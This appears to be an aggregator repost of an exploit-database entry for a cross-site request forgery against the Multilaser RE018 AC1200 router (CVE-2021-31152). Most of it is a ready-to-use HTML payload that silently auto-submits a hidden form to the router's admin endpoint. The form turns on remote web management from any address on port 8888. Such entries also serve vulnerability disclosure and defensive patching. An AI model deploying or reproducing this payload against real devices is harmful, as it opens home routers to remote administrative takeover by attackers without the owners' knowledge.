[webapps] Multilaser Router RE018 AC1200 - Cross-Site Request Forgery (Enable Remote Access)

3 years ago 174
BOOK THIS SPACE FOR AD
ARTICLE AD
# Exploit Title: Multilaser Router RE018 AC1200 - Cross-Site Request Forgery (Enable Remote Access) # Date: 14/04/2021 # Exploit Author: Rodolfo Mariano # Version: Firmware V02.03.01.45_pt # CVE: 2021-31152 # Exploit Code: <html> <body> <form action="http://192.168.0.1/goform/setSysTools" method="POST"> <input name="module4" value="remoteWeb" type="hidden"> <input name="remoteWebType" value="any" type="hidden"> <input name="remoteWebIP" value="" type="hidden"> <input name="remoteWebPort" value="8888" type="hidden"> <input type="submit" value="Submit request"> </form> <script> document.forms[0].submit(); </script> </body> </html>
Read Entire Article